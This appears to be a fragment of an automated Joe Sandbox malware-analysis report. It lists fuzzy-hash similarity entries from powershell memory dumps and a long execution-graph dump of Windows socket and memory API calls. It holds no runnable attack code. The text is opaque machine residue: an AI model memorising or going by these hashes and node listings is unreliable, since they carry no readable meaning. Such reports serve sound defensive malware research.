• Instruction Fuzzy Hash: 31416BB17043599FD7294B698C00B2BBFE6FF8A710F1584AAE948DF291CA31CC41C3A1

Strings
Memory Dump Source
• Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
Similarity
• API ID:
• String ID: $jq$$jq$$jq$$jq
• API String ID: 0-2428501249
• Opcode ID: 34627e013b3d47e2394d1eb90f785f9bc865ba9cb774503730e6cc9b378f1b51
• Instruction ID: 1ad7090ea8e0e8950be8c12541ea5be25fa85cc98ca4eed044f6998c4b8568aa
• Opcode Fuzzy Hash: 34627e013b3d47e2394d1eb90f785f9bc865ba9cb774503730e6cc9b378f1b51
• Instruction Fuzzy Hash: 402137B13183065BFB2C596A895073B77EAEBC5711F20842AE90DDB795CD36C88183A1

Strings
Memory Dump Source
• Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
Similarity
• API ID:
• String ID: $jq$$jq$$jq$$jq
• API String ID: 0-2428501249
• Opcode ID: b50c69f343f0ba8328f2f21c112fb6449cb2e59cacd91858e9336ff62ee6af7c
• Instruction ID: f1d61e1c885a21358e69ed9e4869d5816a7bb542da4e7aa96da469c80e927618
• Opcode Fuzzy Hash: b50c69f343f0ba8328f2f21c112fb6449cb2e59cacd91858e9336ff62ee6af7c
• Instruction Fuzzy Hash: 3F21C4F6A043079FEB398E65CD002A6BBB5BF46250F1D407AD84D87242D735C985C7A3

Strings
Memory Dump Source
• Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'jq$4'jq$$jq$$jq
• API String ID: 0-1496060811
• Opcode ID: 62c38c2eea934cf7a7b27fc79999b4d9d038a5833061911a461f7c6489369b07
• Instruction ID: 7b2b6610da0c140cfc7995a73a4ffddf519d954972148c904a279f37f0cd7b97
• Opcode Fuzzy Hash: 62c38c2eea934cf7a7b27fc79999b4d9d038a5833061911a461f7c6489369b07
• Instruction Fuzzy Hash: EF01D46134D39E8FD72B163858201AA7FB69FC351032A00EBC585DF2E7C9698D46C367

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 1.5%
Total number of Nodes: 1579
Total number of Limit Nodes: 17
execution_graph: serialized node/edge listing of the rendered execution graph (node id, code address, resolved API names such as malloc, memset, calloc, free, _mbstowcs_s, memcmp, strlen, time, gmtime, CreateEventA, WaitForSingleObject, CloseHandle, WSAIoctl, WSASend, closesocket, shutdown, RegisterWaitForSingleObject, and edges written as `source->target`); the full listing is omitted here as graph residue.
5955b6e memcmp 16193->16194 16195 5955b88 memcmp 16193->16195 16194->16192 16194->16193 16195->16192 16195->16193 16216 595682b 16196->16216 16198 5958225 16198->15755 16260 5956a62 16199->16260 16201 59581ea 16201->15755 16203 594f3e3 __cfltcvt 16202->16203 16315 5952416 memset 16203->16315 16205 594f3fc 16206 595246f calloc 16205->16206 16209 594f408 16206->16209 16207 5952427 free 16208 594f472 16207->16208 16210 594f481 16208->16210 16211 594dd9a 8 API calls 16208->16211 16209->16207 16210->15758 16211->16210 16213 59582f2 16212->16213 16215 59582eb 16212->16215 16213->16215 16316 595688d 16213->16316 16215->15758 16217 5956842 16216->16217 16221 5956866 16217->16221 16222 595678e 16217->16222 16221->16198 16228 595679e 16222->16228 16225 595686c 16244 5958daa 16225->16244 16227 5956889 16227->16221 16231 59608ac 16228->16231 16230 595679b 16230->16221 16230->16225 16232 5958b12 free free 16231->16232 16233 59608b7 16232->16233 16234 5960b08 16233->16234 16235 59608c8 16233->16235 16236 5958b12 free free 16234->16236 16237 5960af9 16235->16237 16238 5960ae9 16235->16238 16243 59608cf 16235->16243 16241 5960b0e 16236->16241 16240 5960cd9 7 API calls 16237->16240 16239 5960bf5 7 API calls 16238->16239 16242 5960af6 16239->16242 16240->16242 16241->16230 16242->16230 16243->16230 16245 5958de5 16244->16245 16246 5958db4 16244->16246 16245->16227 16246->16245 16249 5958d1d 16246->16249 16250 5958d28 16249->16250 16256 5958d3e 16249->16256 16251 5958d30 16250->16251 16253 5958d41 __cfltcvt 16250->16253 16252 5958c05 __cfltcvt calloc free memset 16251->16252 16251->16256 16252->16256 16254 594fb69 _mbstowcs_s free calloc free memset 16253->16254 16253->16256 16255 5958d7b 16254->16255 16255->16256 16257 594fb69 _mbstowcs_s free calloc free memset 16255->16257 16256->16227 16258 5958d91 16257->16258 16258->16256 16259 594f7eb __cfltcvt calloc free memset 16258->16259 16259->16256 16269 5956aca 16260->16269 16263 5956aca 4 API calls 16264 5956a90 16263->16264 16265 
5956aca 4 API calls 16264->16265 16268 5956ab4 __cfltcvt 16264->16268 16266 5956aa6 16265->16266 16266->16268 16273 5956b1a 16266->16273 16268->16201 16270 5956adf 16269->16270 16272 5956a7a 16269->16272 16270->16272 16283 594fb69 16270->16283 16272->16263 16272->16268 16274 5956b2a _mbstowcs_s 16273->16274 16275 594f7eb __cfltcvt 3 API calls 16274->16275 16276 5956b3e 16275->16276 16280 5956b55 __cfltcvt 16276->16280 16302 595039d 16276->16302 16277 594f49d _mbstowcs_s free 16279 5956b90 16277->16279 16281 594f49d _mbstowcs_s free 16279->16281 16280->16277 16282 5956b99 16281->16282 16282->16268 16284 594fba6 16283->16284 16285 594fb93 16283->16285 16289 594fbb8 __cfltcvt _mbstowcs_s 16284->16289 16297 594f7eb 16284->16297 16287 594f49d _mbstowcs_s free 16285->16287 16288 594fb99 _mbstowcs_s 16287->16288 16291 594f4e6 16288->16291 16289->16272 16292 594f4f5 16291->16292 16294 594f50f 16291->16294 16293 594f4fe calloc 16292->16293 16292->16294 16293->16294 16295 594f514 __cfltcvt _mbstowcs_s 16293->16295 16294->16284 16295->16294 16296 594f534 free 16295->16296 16296->16294 16298 594f4e6 __cfltcvt calloc free 16297->16298 16299 594f7f9 16298->16299 16300 594f801 memset 16299->16300 16301 594f81e 16299->16301 16300->16301 16301->16289 16303 59503aa 16302->16303 16306 59502f6 16303->16306 16307 595033d 16306->16307 16308 595030f __cfltcvt 16306->16308 16309 59500cd _mbstowcs_s free calloc free memset 16307->16309 16310 5950327 16308->16310 16311 595031a 16308->16311 16312 5950325 16309->16312 16314 59501a1 __cfltcvt free calloc free memset 16310->16314 16313 59501a1 __cfltcvt free calloc free memset 16311->16313 16312->16280 16313->16312 16314->16312 16315->16205 16317 5956899 16316->16317 16318 595678e 7 API calls 16317->16318 16319 59568aa 16317->16319 16318->16319 16320 59568b0 16319->16320 16322 59568e0 16319->16322 16320->16215 16323 5956906 16322->16323 16324 59568eb 16322->16324 16326 5956902 16323->16326 16327 5958bb7 __cfltcvt 4 API calls 16323->16327 16330 
5958bb7 16324->16330 16326->16320 16328 595692c 16327->16328 16328->16326 16337 594f5df 16328->16337 16331 594f5df __cfltcvt 4 API calls 16330->16331 16332 5958bc8 16331->16332 16333 5958bee 16332->16333 16334 594f5df __cfltcvt 4 API calls 16332->16334 16333->16326 16335 5958bdb 16334->16335 16335->16333 16336 594f5df __cfltcvt 4 API calls 16335->16336 16336->16333 16338 594f5f5 16337->16338 16345 594f602 __cfltcvt 16337->16345 16339 594f607 16338->16339 16340 594f5fc 16338->16340 16342 594f63c memset 16339->16342 16343 594f62a 16339->16343 16341 594f49d _mbstowcs_s free 16340->16341 16341->16345 16342->16345 16344 594f4e6 __cfltcvt 2 API calls 16343->16344 16344->16345 16345->16326 16347 5956bb7 __cfltcvt 16346->16347 16349 5956c26 16346->16349 16347->16349 16351 5956b1a 5 API calls 16347->16351 16352 5956c2d 16347->16352 16387 5951551 16347->16387 16395 594fdc4 16347->16395 16349->15784 16358 5956c80 16349->16358 16351->16347 16399 5950d02 16352->16399 16355 5956b1a 5 API calls 16356 5956c52 16355->16356 16356->16349 16456 594fc47 16356->16456 16359 5956c9d 16358->16359 16371 5956c93 16358->16371 16360 5956b1a 5 API calls 16359->16360 16361 5956cad _mbstowcs_s 16360->16361 16362 5956cc7 16361->16362 16363 5956d10 16361->16363 16361->16371 16556 5956da6 16362->16556 16365 594f5df __cfltcvt 4 API calls 16363->16365 16367 5956d0b 16365->16367 16368 5956d84 16367->16368 16372 5950d02 7 API calls 16367->16372 16370 594f49d _mbstowcs_s free 16368->16370 16370->16371 16371->15787 16374 5956d3a 16372->16374 16374->16368 16376 5956d66 __cfltcvt 16374->16376 16377 59503e6 _mbstowcs_s 5 API calls 16374->16377 16375 5950c8e _mbstowcs_s 5 API calls 16375->16367 16376->16368 16379 594fc47 __cfltcvt memset 16376->16379 16378 5956d53 16377->16378 16378->16368 16380 5950c8e _mbstowcs_s 5 API calls 16378->16380 16379->16368 16380->16376 16666 5956971 16381->16666 16384 59569be 16719 59569df 16384->16719 16388 595157c 16387->16388 16394 595158f 16387->16394 16390 594f49d 
_mbstowcs_s free 16388->16390 16389 594f7eb __cfltcvt 3 API calls 16392 59515a1 _mbstowcs_s 16389->16392 16391 5951582 _mbstowcs_s 16390->16391 16393 594f4e6 __cfltcvt 2 API calls 16391->16393 16392->16347 16393->16394 16394->16389 16394->16392 16396 594fdea 16395->16396 16397 594f7eb __cfltcvt 3 API calls 16396->16397 16398 594fdf1 16396->16398 16397->16398 16398->16347 16398->16398 16400 5950d19 __cfltcvt _mbstowcs_s 16399->16400 16401 5950d67 memset 16400->16401 16422 5951242 16400->16422 16402 5950d81 __cfltcvt 16401->16402 16403 594f4e6 __cfltcvt 2 API calls 16402->16403 16404 5950dce 16403->16404 16405 59511d5 16404->16405 16407 594f4e6 __cfltcvt 2 API calls 16404->16407 16406 595120a 16405->16406 16410 594f49d _mbstowcs_s free 16405->16410 16409 594f49d _mbstowcs_s free 16406->16409 16408 5950de7 16407->16408 16408->16405 16412 594f4e6 __cfltcvt 2 API calls 16408->16412 16411 5951216 16409->16411 16410->16405 16413 594f49d _mbstowcs_s free 16411->16413 16414 5950e00 16412->16414 16415 595121f 16413->16415 16414->16405 16417 5950e26 16414->16417 16419 594f5df __cfltcvt 4 API calls 16414->16419 16416 594f49d _mbstowcs_s free 16415->16416 16418 5951228 16416->16418 16417->16405 16421 594f7eb __cfltcvt 3 API calls 16417->16421 16426 5950e49 __cfltcvt 16417->16426 16420 594f49d _mbstowcs_s free 16418->16420 16418->16422 16419->16417 16420->16422 16423 5950e5d 16421->16423 16422->16349 16422->16355 16423->16405 16459 594fcdc 16423->16459 16425 5950e79 16425->16405 16463 5950c8e 16425->16463 16426->16405 16428 5950ed6 16426->16428 16429 5950ec3 16426->16429 16431 594f5df __cfltcvt 4 API calls 16428->16431 16430 5950c8e _mbstowcs_s 5 API calls 16429->16430 16432 5950ed1 16430->16432 16431->16432 16432->16405 16472 5951285 16432->16472 16434 5950f07 16434->16405 16435 594f5df __cfltcvt 4 API calls 16434->16435 16436 5950f20 16435->16436 16436->16405 16476 5951379 16436->16476 16439 594f4e6 __cfltcvt 2 API calls 16440 5950f72 16439->16440 16440->16405 16442 594f5df 
__cfltcvt 4 API calls 16440->16442 16441 5951195 16445 5951379 memset 16441->16445 16450 5950f8b 16442->16450 16443 5951285 memset 16446 5951048 16443->16446 16444 5951137 16444->16405 16444->16441 16448 5951285 memset 16444->16448 16451 59511aa 16445->16451 16446->16405 16446->16443 16446->16444 16447 5951285 memset 16447->16450 16448->16444 16449 594f4e6 __cfltcvt 2 API calls 16454 5950fcc 16449->16454 16450->16405 16450->16447 16450->16454 16451->16405 16479 5950298 16451->16479 16453 594f5df __cfltcvt 4 API calls 16453->16454 16454->16405 16454->16446 16454->16449 16454->16453 16455 5951285 memset 16454->16455 16455->16454 16457 594fc76 16456->16457 16458 594fc5d memset 16456->16458 16457->16349 16458->16457 16460 594fcff __cfltcvt 16459->16460 16461 594f4e6 __cfltcvt 2 API calls 16460->16461 16462 594fd24 16460->16462 16461->16462 16462->16425 16462->16462 16464 5950c9b __cfltcvt 16463->16464 16465 5950ca1 16464->16465 16488 595076b 16464->16488 16465->16426 16467 5950cfc 16467->16426 16468 5950cb9 __cfltcvt 16468->16467 16469 5950298 _mbstowcs_s 4 API calls 16468->16469 16470 5950cdc __cfltcvt 16468->16470 16469->16468 16470->16467 16471 59502f6 _mbstowcs_s 4 API calls 16470->16471 16471->16470 16473 59512a2 16472->16473 16475 59512d3 __cfltcvt _mbstowcs_s 16472->16475 16474 59512ad memset 16473->16474 16473->16475 16474->16475 16475->16434 16477 5951285 memset 16476->16477 16478 5950f3c 16477->16478 16478->16405 16478->16439 16478->16446 16480 59502b1 __cfltcvt 16479->16480 16481 59502df 16479->16481 16484 59502bc 16480->16484 16485 59502c9 16480->16485 16548 59500cd 16481->16548 16483 59502c7 16483->16405 16540 59501a1 16484->16540 16486 59501a1 __cfltcvt 4 API calls 16485->16486 16486->16483 16489 595077f __cfltcvt _mbstowcs_s 16488->16489 16490 59507cd 16489->16490 16491 5950808 16489->16491 16512 5950785 16489->16512 16493 59507db 16490->16493 16495 594f7eb __cfltcvt 3 API calls 16490->16495 16492 594f5df __cfltcvt 4 API calls 16491->16492 16494 5950812 
16492->16494 16496 594f5df __cfltcvt 4 API calls 16493->16496 16493->16512 16532 59507f5 __cfltcvt 16493->16532 16498 594f5df __cfltcvt 4 API calls 16494->16498 16494->16532 16495->16493 16496->16532 16497 594f49d _mbstowcs_s free 16499 5950c04 16497->16499 16500 595082a 16498->16500 16501 594f49d _mbstowcs_s free 16499->16501 16503 594f4e6 __cfltcvt 2 API calls 16500->16503 16500->16532 16502 5950c0d 16501->16502 16504 594f49d _mbstowcs_s free 16502->16504 16505 595084e 16503->16505 16506 5950c16 16504->16506 16508 594f7eb __cfltcvt 3 API calls 16505->16508 16505->16532 16507 594f49d _mbstowcs_s free 16506->16507 16509 5950c1f 16507->16509 16510 5950864 16508->16510 16511 594f49d _mbstowcs_s free 16509->16511 16513 594f4e6 __cfltcvt 2 API calls 16510->16513 16510->16532 16511->16512 16512->16468 16514 595087b 16513->16514 16515 594f4e6 __cfltcvt 2 API calls 16514->16515 16514->16532 16516 5950892 __cfltcvt 16515->16516 16517 594fcdc _mbstowcs_s 2 API calls 16516->16517 16521 59508d6 16516->16521 16516->16532 16518 59508c0 16517->16518 16520 594fcdc _mbstowcs_s 2 API calls 16518->16520 16518->16532 16519 594fcdc _mbstowcs_s 2 API calls 16527 595090e __cfltcvt 16519->16527 16520->16521 16521->16519 16521->16532 16522 5950975 16523 594fdc4 _mbstowcs_s 3 API calls 16522->16523 16535 595097f __cfltcvt _mbstowcs_s 16523->16535 16524 59502f6 _mbstowcs_s 4 API calls 16524->16527 16525 5950b8d 16526 5950b9e 16525->16526 16528 594f5df __cfltcvt 4 API calls 16525->16528 16529 594fdc4 _mbstowcs_s 3 API calls 16526->16529 16526->16532 16527->16522 16527->16524 16527->16532 16528->16526 16530 5950bc6 16529->16530 16531 594f5df __cfltcvt 4 API calls 16530->16531 16530->16532 16531->16532 16532->16497 16532->16512 16533 595073c 5 API calls _mbstowcs_s 16533->16535 16534 594f7eb calloc free memset __cfltcvt 16534->16535 16535->16525 16535->16532 16535->16533 16535->16534 16536 59502f6 _mbstowcs_s 4 API calls 16535->16536 16537 594f5df __cfltcvt 4 API calls 16535->16537 16538 
594fcdc calloc free _mbstowcs_s 16535->16538 16539 5950298 _mbstowcs_s 4 API calls 16535->16539 16536->16535 16537->16535 16538->16535 16539->16535 16541 59501b4 __cfltcvt _mbstowcs_s 16540->16541 16542 59501dc 16541->16542 16543 594f5df __cfltcvt 4 API calls 16541->16543 16547 59501ba 16541->16547 16544 594f5df __cfltcvt 4 API calls 16542->16544 16545 59501f5 __cfltcvt 16542->16545 16543->16542 16544->16545 16546 594f49d _mbstowcs_s free 16545->16546 16546->16547 16547->16483 16549 59500dc 16548->16549 16550 594f5df __cfltcvt 4 API calls 16549->16550 16551 59500f0 16549->16551 16550->16551 16552 594f4e6 __cfltcvt 2 API calls 16551->16552 16553 5950199 16551->16553 16554 5950126 16552->16554 16553->16483 16554->16553 16555 594f4e6 __cfltcvt 2 API calls 16554->16555 16555->16554 16557 5956dc1 __cfltcvt 16556->16557 16558 5956dc7 16557->16558 16559 5956dfc __cfltcvt 16557->16559 16560 594f5df __cfltcvt 4 API calls 16558->16560 16562 5956e0d 16559->16562 16574 5956e64 __cfltcvt 16559->16574 16561 5956dce 16560->16561 16563 5956cd3 16561->16563 16564 594f7eb __cfltcvt 3 API calls 16561->16564 16565 59503e6 _mbstowcs_s 5 API calls 16562->16565 16563->16368 16581 59503e6 16563->16581 16566 5956de3 16564->16566 16567 5956e15 16565->16567 16566->16563 16568 594f7eb __cfltcvt 3 API calls 16566->16568 16567->16563 16570 5950c8e _mbstowcs_s 5 API calls 16567->16570 16568->16563 16569 5951551 _mbstowcs_s 4 API calls 16569->16574 16571 5956e2b 16570->16571 16571->16563 16572 59503e6 _mbstowcs_s 5 API calls 16571->16572 16573 5956e41 16572->16573 16573->16563 16575 5950c8e _mbstowcs_s 5 API calls 16573->16575 16574->16563 16574->16569 16576 594fdc4 _mbstowcs_s 3 API calls 16574->16576 16577 5956ec2 16574->16577 16575->16563 16576->16574 16595 59515cd 16577->16595 16580 5950d02 7 API calls 16580->16563 16582 59503f8 _mbstowcs_s 16581->16582 16583 5950415 16582->16583 16584 594f5df __cfltcvt 4 API calls 16582->16584 16585 594f5df __cfltcvt 4 API calls 16583->16585 16587 595043c 
16583->16587 16594 59504a0 _mbstowcs_s 16583->16594 16584->16583 16585->16587 16586 594f49d _mbstowcs_s free 16589 59504e7 16586->16589 16588 594f4e6 __cfltcvt 2 API calls 16587->16588 16587->16594 16590 595048e 16588->16590 16591 594f49d _mbstowcs_s free 16589->16591 16593 594f7eb __cfltcvt 3 API calls 16590->16593 16590->16594 16592 59504f0 16591->16592 16592->16368 16592->16375 16593->16594 16594->16586 16596 59515e0 __cfltcvt _mbstowcs_s 16595->16596 16626 59515e6 16596->16626 16643 59513ab 16596->16643 16598 594f49d _mbstowcs_s free 16599 5951997 16598->16599 16601 594f49d _mbstowcs_s free 16599->16601 16600 5951650 __cfltcvt 16603 5950c8e _mbstowcs_s 5 API calls 16600->16603 16642 595166f 16600->16642 16602 59519a0 16601->16602 16604 594f49d _mbstowcs_s free 16602->16604 16606 5951686 16603->16606 16605 59519a9 16604->16605 16607 594f49d _mbstowcs_s free 16605->16607 16608 594f5df __cfltcvt 4 API calls 16606->16608 16606->16642 16609 59519b2 16607->16609 16610 59516a0 16608->16610 16611 594f49d _mbstowcs_s free 16609->16611 16613 594f5df __cfltcvt 4 API calls 16610->16613 16610->16642 16612 59519bb 16611->16612 16614 594f49d _mbstowcs_s free 16612->16614 16615 59516b8 16613->16615 16616 59519c4 16614->16616 16617 594f5df __cfltcvt 4 API calls 16615->16617 16615->16642 16618 594f49d _mbstowcs_s free 16616->16618 16619 59516d0 16617->16619 16620 59519cd 16618->16620 16622 594f7eb __cfltcvt 3 API calls 16619->16622 16619->16642 16621 594f49d _mbstowcs_s free 16620->16621 16623 59519d6 16621->16623 16624 59516e6 16622->16624 16625 594f49d _mbstowcs_s free 16623->16625 16627 594f7eb __cfltcvt 3 API calls 16624->16627 16624->16642 16625->16626 16626->16563 16626->16580 16628 59516fc 16627->16628 16629 594f7eb __cfltcvt 3 API calls 16628->16629 16628->16642 16630 5951712 16629->16630 16631 594f7eb __cfltcvt 3 API calls 16630->16631 16630->16642 16632 5951728 __cfltcvt 16631->16632 16633 5950298 free calloc free memset _mbstowcs_s 16632->16633 16634 59502f6 free 
calloc free memset _mbstowcs_s 16632->16634 16635 594fdc4 calloc free memset _mbstowcs_s 16632->16635 16636 5951926 __cfltcvt 16632->16636 16632->16642 16633->16632 16634->16632 16635->16632 16637 5950298 _mbstowcs_s 4 API calls 16636->16637 16638 5951951 __cfltcvt 16636->16638 16636->16642 16637->16636 16639 595197e 16638->16639 16640 59502f6 _mbstowcs_s 4 API calls 16638->16640 16638->16642 16641 594f5df __cfltcvt 4 API calls 16639->16641 16640->16638 16641->16642 16642->16598 16644 59513bd _mbstowcs_s 16643->16644 16645 594f5df __cfltcvt 4 API calls 16644->16645 16646 59513db 16645->16646 16647 5951528 16646->16647 16648 594f5df __cfltcvt 4 API calls 16646->16648 16649 594f49d _mbstowcs_s free 16647->16649 16655 59513f4 _mbstowcs_s 16648->16655 16650 5951535 16649->16650 16651 594f49d _mbstowcs_s free 16650->16651 16652 595153e 16651->16652 16653 594f49d _mbstowcs_s free 16652->16653 16654 5951547 16653->16654 16654->16600 16655->16647 16656 594fdc4 _mbstowcs_s 3 API calls 16655->16656 16657 5951426 16656->16657 16657->16647 16658 594fdc4 _mbstowcs_s 3 API calls 16657->16658 16664 595143c __cfltcvt _mbstowcs_s 16658->16664 16659 595150a 16660 594fcdc _mbstowcs_s 2 API calls 16659->16660 16661 5951514 16660->16661 16661->16647 16663 594f5df __cfltcvt 4 API calls 16661->16663 16662 594fdc4 calloc free memset _mbstowcs_s 16662->16664 16663->16647 16664->16647 16664->16659 16664->16662 16665 59501a1 free calloc free memset __cfltcvt 16664->16665 16665->16664 16667 5956986 16666->16667 16671 595696c 16666->16671 16672 5956633 16667->16672 16671->15784 16671->16384 16679 5956651 16672->16679 16675 5958dec 16676 5958e00 16675->16676 16677 5958df9 16675->16677 16710 5958c4e 16676->16710 16677->16671 16684 595b3f4 16679->16684 16682 595664c 16682->16671 16682->16675 16685 5956667 16684->16685 16688 595b417 __cfltcvt 16684->16688 16685->16682 16702 5958e7d 16685->16702 16686 5951551 _mbstowcs_s free calloc free memset 16686->16688 16687 595b4c4 __cfltcvt _mbstowcs_s 
16687->16685 16689 5951551 _mbstowcs_s free calloc free memset 16687->16689 16691 594fdc4 _mbstowcs_s calloc free memset 16687->16691 16688->16685 16688->16686 16688->16687 16690 595b449 __cfltcvt 16688->16690 16689->16687 16692 595b469 16690->16692 16693 595b45a 16690->16693 16691->16687 16695 594f860 _mbstowcs_s calloc free 16692->16695 16694 594fdc4 _mbstowcs_s calloc free memset 16693->16694 16696 595b465 16694->16696 16695->16696 16696->16685 16697 594f860 _mbstowcs_s calloc free 16696->16697 16698 595b48b 16697->16698 16698->16685 16699 594f860 _mbstowcs_s calloc free 16698->16699 16700 595b4a3 16699->16700 16700->16685 16700->16687 16701 594f860 _mbstowcs_s calloc free 16700->16701 16701->16687 16703 5958e8d __cfltcvt 16702->16703 16704 595b0e4 __cfltcvt 5 API calls 16703->16704 16709 5958ef3 16703->16709 16705 5958e9c 16704->16705 16706 595a7fa __cfltcvt 5 API calls 16705->16706 16707 5958ec8 16705->16707 16705->16709 16706->16707 16708 5958ef9 __cfltcvt 12 API calls 16707->16708 16707->16709 16708->16709 16709->16682 16712 5958c67 __cfltcvt 16710->16712 16711 5958c6d 16711->16677 16712->16711 16713 5958c9b 16712->16713 16716 5958cd8 __cfltcvt 16712->16716 16713->16711 16714 594fc47 __cfltcvt memset 16713->16714 16715 5958cba 16714->16715 16715->16711 16717 594fc47 __cfltcvt memset 16715->16717 16716->16711 16718 594fc47 __cfltcvt memset 16716->16718 16717->16711 16718->16711 16720 59569eb 16719->16720 16724 59569da 16719->16724 16720->16724 16725 595668d 16720->16725 16722 5956a0f __cfltcvt 16723 594fc47 __cfltcvt memset 16722->16723 16722->16724 16723->16724 16724->15787 16728 59566ae 16725->16728 16729 59566be __cfltcvt 16728->16729 16730 5958e7d __cfltcvt 12 API calls 16729->16730 16734 59566d9 __cfltcvt 16730->16734 16731 59566f0 16732 5958aec __cfltcvt free 16731->16732 16733 59566a9 16732->16733 16733->16722 16734->16731 16735 594f5df __cfltcvt 4 API calls 16734->16735 16735->16731 16737 594ef8e 2 API calls 16736->16737 16738 594e536 16737->16738 
16739 594e523 16738->16739 16740 594ef4e free 16738->16740 16739->15655 16740->16739 16741 5942b8f calloc 16742 5942d2c 16741->16742 16743 5942bb3 memset time srand calloc 16741->16743 16745 5942d01 free 16743->16745 16747 5942c19 16743->16747 16745->16742 16759 59448ba 16747->16759 16749 5942c3c strlen 16764 59455e8 16749->16764 16751 5942c52 16758 5942ce1 16751->16758 16769 5948ac2 16751->16769 16752 5943c47 free 16754 5942ced 16752->16754 16755 5942cf5 free 16754->16755 16755->16745 16756 5942c62 16772 5948b5e 16756->16772 16758->16752 16780 594f11a memset 16759->16780 16761 59448d8 16781 594f12e 16761->16781 16763 59448e4 16763->16749 16765 59455f7 strlen 16764->16765 16766 59455fe 16764->16766 16765->16766 16785 5945640 16766->16785 16768 594560c 16768->16751 16770 5948dfb 5 API calls 16769->16770 16771 5948ad1 16770->16771 16771->16756 16775 5948b69 16772->16775 16773 5948b6e 16773->16758 16775->16773 16779 5948b9e 16775->16779 16790 5948ca1 16775->16790 16800 5948e62 GetTickCount 16775->16800 16779->16773 16779->16775 16802 5948c19 16779->16802 16806 5948d93 16779->16806 16780->16761 16782 594f13e 16781->16782 16783 594f166 memset memset 16782->16783 16784 594f1b7 16783->16784 16784->16763 16786 5945674 16785->16786 16787 5945651 memcmp 16785->16787 16788 5945665 16786->16788 16789 5945679 memcmp 16786->16789 16787->16786 16787->16788 16788->16768 16789->16788 16791 5948d67 16790->16791 16792 5948cb3 16790->16792 16791->16779 16792->16791 16793 5948d02 16792->16793 16813 594a983 16792->16813 16818 594a53b 16792->16818 16831 594a894 16792->16831 16838 594becb 16792->16838 16845 594b89d 16792->16845 16793->16792 16825 594a7b9 16793->16825 16801 5948e71 16800->16801 16801->16775 16805 5948c1e 16802->16805 16803 5948c77 16803->16779 16805->16803 16895 594984b 16805->16895 16807 5948da2 16806->16807 16808 5948da9 GetQueuedCompletionStatus 16806->16808 16912 5949540 16807->16912 16810 5948dd4 GetLastError 16808->16810 16812 5948dc6 16808->16812 16810->16812 
16812->16779 16814 594a991 16813->16814 16815 594a9c6 setsockopt 16814->16815 16817 594a9e1 16814->16817 16816 594a9ff WSAGetLastError 16815->16816 16815->16817 16816->16817 16817->16792 16820 594a5ea 16818->16820 16823 594a55b 16818->16823 16819 594a628 WSARecv 16819->16820 16821 594a6f2 WSAGetLastError 16819->16821 16820->16819 16824 594a671 16820->16824 16821->16824 16822 5949f64 8 API calls 16822->16823 16823->16792 16824->16822 16824->16823 16829 594a7cf 16825->16829 16826 594a80f 16828 594a81d 16826->16828 16830 594a816 CloseHandle 16826->16830 16827 594a808 UnregisterWait 16827->16826 16828->16793 16829->16826 16829->16827 16829->16828 16830->16828 16832 594a8f9 16831->16832 16837 594a8a7 16831->16837 16833 594a940 closesocket 16832->16833 16834 594a903 setsockopt 16832->16834 16835 594a953 16833->16835 16833->16837 16834->16833 16834->16837 16851 5949ca2 socket 16835->16851 16837->16792 16839 594beea 16838->16839 16840 594bfa0 memset WSARecvFrom 16839->16840 16844 594bf06 16839->16844 16842 594bff6 WSAGetLastError 16840->16842 16840->16844 16842->16844 16843 594c08f 16843->16792 16844->16843 16867 594bcf1 memset 16844->16867 16846 594b8b7 16845->16846 16847 594b8b0 16845->16847 16882 594b9e5 16846->16882 16878 594b8c1 16847->16878 16850 594b8b5 16850->16792 16852 5949d04 SetHandleInformation 16851->16852 16853 5949cdc 16851->16853 16854 5949d4f memset 16852->16854 16858 5949d13 16852->16858 16853->16837 16855 5949d6c 16854->16855 16856 5949d9c 16855->16856 16857 5949dbb GetLastError 16855->16857 16856->16853 16862 5949e38 RegisterWaitForSingleObject 16856->16862 16857->16856 16859 5949dc8 WSAGetLastError 16857->16859 16864 5949d3e closesocket 16858->16864 16860 5949dd2 WSAGetLastError 16859->16860 16861 5949dda WSAGetLastError 16859->16861 16863 5949dea 16860->16863 16861->16863 16862->16853 16865 5949df6 closesocket 16863->16865 16864->16853 16865->16853 16866 5949e09 CloseHandle 16865->16866 16866->16853 16868 594bd22 memset 16867->16868 16869 594bdee 
16867->16869 16872 594bd80 16868->16872 16871 594be43 GetLastError 16869->16871 16877 594bd84 16869->16877 16873 594be50 WSAGetLastError 16871->16873 16871->16877 16874 594bdb6 GetLastError 16872->16874 16872->16877 16875 594be62 WSAGetLastError 16873->16875 16876 594be5a WSAGetLastError 16873->16876 16874->16877 16875->16877 16876->16877 16877->16843 16880 594b8d6 16878->16880 16879 594b9bb 16879->16850 16880->16879 16886 594b629 16880->16886 16883 594b9fa 16882->16883 16885 594ba96 16883->16885 16891 594b721 16883->16891 16885->16850 16887 594b642 memset 16886->16887 16889 594b2a0 7 API calls 16887->16889 16890 594b6e5 16889->16890 16890->16879 16892 594b737 QueueUserWorkItem 16891->16892 16894 594b792 16892->16894 16894->16885 16896 5949864 16895->16896 16898 594992f 16895->16898 16897 5949878 16896->16897 16896->16898 16900 59498c2 shutdown 16897->16900 16903 59498b5 16897->16903 16899 594994b closesocket 16898->16899 16898->16903 16909 5949957 16898->16909 16899->16909 16901 59498d8 WSAGetLastError 16900->16901 16900->16903 16901->16903 16902 59499dd 16902->16903 16905 59499f3 UnregisterWait 16902->16905 16906 59499fe 16902->16906 16903->16805 16904 59499d0 free 16904->16902 16905->16906 16906->16903 16907 5949a05 CloseHandle 16906->16907 16907->16903 16908 5949992 UnregisterWait 16908->16909 16909->16902 16909->16904 16909->16908 16910 59499ac CloseHandle 16909->16910 16911 59499ce 16909->16911 16910->16909 16911->16904 16913 5949551 16912->16913 16914 5948e62 GetTickCount 16913->16914 16915 5948da8 16913->16915 16914->16915 16915->16808 15185 5948aad SetErrorMode 15186 5948abd 15185->15186 15187 594ae89 WSAStartup 15186->15187 15202 594ac49 memset htons inet_addr 15187->15202 15189 